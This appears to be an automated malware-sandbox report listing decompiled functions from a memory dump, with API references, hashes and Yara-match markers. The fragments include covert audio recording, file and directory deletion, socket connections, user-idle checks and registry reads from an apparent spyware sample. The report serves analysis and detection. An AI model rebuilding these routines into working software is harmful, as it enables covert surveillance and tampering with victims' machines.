                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                        • String ID:
                                        • API String ID: 758954411-0
                                        • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                        • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D813, Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                        • Opcode Fuzzy Hash: 7a90a6c496572f5477e3ca14f1288a0fe9fbd8b3c6f5b3533141e0d3030503f8
                                        • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D80A, Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                        • String ID:
                                        • API String ID: 4290155986-0
                                        • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                        • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                        • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406CFF, Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 25%
                                        			E00406CFF(WCHAR* __eax, void* __ecx) {
				WCHAR* _t5;
				signed int _t8;
				signed int _t9;
				void* _t15;

				_t15 = __ecx;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t5 = DeleteFileW(__eax);
				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
				if(_t5 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					RemoveDirectoryW(_t5);
				}
				return _t9;
			}







                                        0x00406d01
                                        0x00406d06
                                        0x00406d0d
                                        0x00406d15
                                        0x00406d21
                                        0x00406d2b
                                        0x00406d2f
                                        0x00406d36
                                        0x00406d36
                                        0x00406d40

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                        • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                        • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                        • String ID:
                                        • API String ID: 1823182134-0
                                        • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                        • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                        • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D7E4, Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0040D7E4(void* __eflags) {
				char* _t5;
				void* _t19;

				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				CloseWindow(atoi(_t5));
				E004017DD(_t19 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                        0x0040d7e9
                                        0x0040d7f0
                                        0x0040d7ff
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
                                        • atoi.MSVCRT ref: 0040D7F7
                                        • CloseWindow.USER32 ref: 0040D7FF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                        • String ID:
                                        • API String ID: 14144500-0
                                        • Opcode ID: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                        • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                        • Opcode Fuzzy Hash: 47d07381fc7f33689a1353f39abe6eb979ecef49076387eb86944de5fc978131
                                        • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004050C0, Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1976170855-0
                                        • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                        • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                        • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402750, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                        • String ID: KeepAlive Disabled!$[WARNING]
                                        • API String ID: 2944585167-3856563802
                                        • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                        • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                        • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                        • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401895, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                          • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 004018A2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 1986322901-3016609489
                                        • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                        • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                        • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040500C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                        • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                        • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                        Strings
                                        • invalid vector<T> subscript, xrefs: 00405019
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                        • String ID: invalid vector<T> subscript
                                        • API String ID: 3609083747-3016609489
                                        • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                        • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                        • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412019, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00412019() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x41c1dc = _t2;
				return _t2;
			}




                                        0x0041202f
                                        0x00412035
                                        0x0041203a

                                        APIs
                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetLastInputInfo$User32.dll
                                        • API String ID: 2574300362-1519888992
                                        • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                        • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                        • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F4AE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040F4AE() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x41bf1c = _t2;
				return _t2;
			}




                                        0x0040f4c4
                                        0x0040f4ca
                                        0x0040f4cf

                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll
                                        • API String ID: 1646373207-2714051624
                                        • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                        • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                        • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413AED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00413AED() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x41c1f8 = _t2;
				return _t2;
			}




                                        0x00413b03
                                        0x00413b09
                                        0x00413b0e

                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                        • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetConsoleWindow$kernel32.dll
                                        • API String ID: 2574300362-100875112
                                        • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                        • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                        • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B615, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
				int _v8;
				int _v12;
				char* _t31;
				signed int _t36;
				signed int _t37;
				void* _t46;

				_v8 = 0;
				_t31 = 0x415664;
				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
					_t31 = malloc(_v8);
					_t36 = _v8;
					_t46 = _t31;
					_t37 = _t36 >> 2;
					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
				return _a4;
			}









                                        0x0040b62f
                                        0x0040b635
                                        0x0040b641
                                        0x0040b652
                                        0x0040b654
                                        0x0040b65b
                                        0x0040b65d
                                        0x0040b667
                                        0x0040b67a
                                        0x0040b67a
                                        0x0040b684
                                        0x0040b691

                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                        • malloc.MSVCRT ref: 0040B64B
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                        • String ID:
                                        • API String ID: 3506253819-0
                                        • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                        • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                        • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004028CD, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                        • String ID:
                                        • API String ID: 182292213-0
                                        • Opcode ID: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                        • Opcode Fuzzy Hash: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                        • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401181, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E00401181(void* __eflags, signed int _a4) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				signed int _t36;

				_t38 = __eflags;
				E0040180C(0x41b200, __eflags, _a4);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
				_t36 = _a4 << 5;
				_t16 = E0040180C(0x41b200, _t38, _a4);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t28 =  *0x41b1dc; // 0x2ea2948
				 *((intOrPtr*)(_t36 + _t28)) = _t16;
				_t17 =  *0x41b1dc; // 0x2ea2948
				_t29 =  *0x41b1d4; // 0x0
				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
				_t30 =  *0x41b1dc; // 0x2ea2948
				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
				_t31 =  *0x41b1dc; // 0x2ea2948
				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
				_t32 =  *0x41b1dc; // 0x2ea2948
				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
				_t33 =  *0x41b1dc; // 0x2ea2948
				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
				_t19 =  *0x41b1dc; // 0x2ea2948
				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
				_t22 =  *0x41b1dc; // 0x2ea2948
				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
			}














                                        0x00401181
                                        0x00401196
                                        0x0040119d
                                        0x004011ab
                                        0x004011ae
                                        0x004011b5
                                        0x004011bb
                                        0x004011c3
                                        0x004011c6
                                        0x004011cb
                                        0x004011d1
                                        0x004011d5
                                        0x004011dd
                                        0x004011e1
                                        0x004011e7
                                        0x004011eb
                                        0x004011f1
                                        0x004011f5
                                        0x004011fb
                                        0x004011ff
                                        0x0040120d
                                        0x00401213
                                        0x0040122c

                                        APIs
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                        • waveInPrepareHeader.WINMM(02EA2948,00000020,?,?,0040116A,00000000), ref: 0040120D
                                        • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
